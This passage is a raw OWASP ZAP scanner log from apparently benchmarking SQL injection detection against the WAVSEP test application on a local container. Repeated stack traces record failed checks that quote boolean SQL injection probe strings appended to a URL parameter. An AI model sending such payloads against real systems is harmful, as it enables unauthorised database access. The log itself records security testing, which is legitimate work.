INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8955496 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8956246 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8956273 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8956763 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8957468 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8958000 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8958580 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8958602 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8959506 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8959961 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8960182 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8960483 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8961345 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8961352 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8961789 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 8961790 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 8961799 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 8962302 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 8962305 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 8962562 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8962594 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 8962697 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 5605=3654 AND (7063=7063] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 5605=3654 AND (7063=7063 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962699 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 3641=3641 AND (6449=6449] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 3641=3641 AND (6449=6449 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962700 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 5605=3654 AND (7063=7063] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) AND 5605=3654 AND (7063=7063 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962701 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 5669=2205] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 5669=2205 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962703 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 3216=3216] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 3216=3216 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962705 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 5669=2205] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp AND 5669=2205 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962707 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 6835=2178 AND ('YZkq'='YZkq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 6835=2178 AND ('YZkq'='YZkq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962708 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 8740=8740 AND ('VmFI'='VmFI] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 8740=8740 AND ('VmFI'='VmFI at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962709 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 6835=2178 AND ('YZkq'='YZkq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp') AND 6835=2178 AND ('YZkq'='YZkq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962711 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 1393=8484 AND 'eeor'='eeor] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 1393=8484 AND 'eeor'='eeor at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962713 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 3627=3627 AND 'uoyG'='uoyG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 3627=3627 AND 'uoyG'='uoyG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962715 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 1393=8484 AND 'eeor'='eeor] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp' AND 1393=8484 AND 'eeor'='eeor at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962717 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 7057=3111 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 7057=3111 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8962718 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 9948=9948 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp%' AND 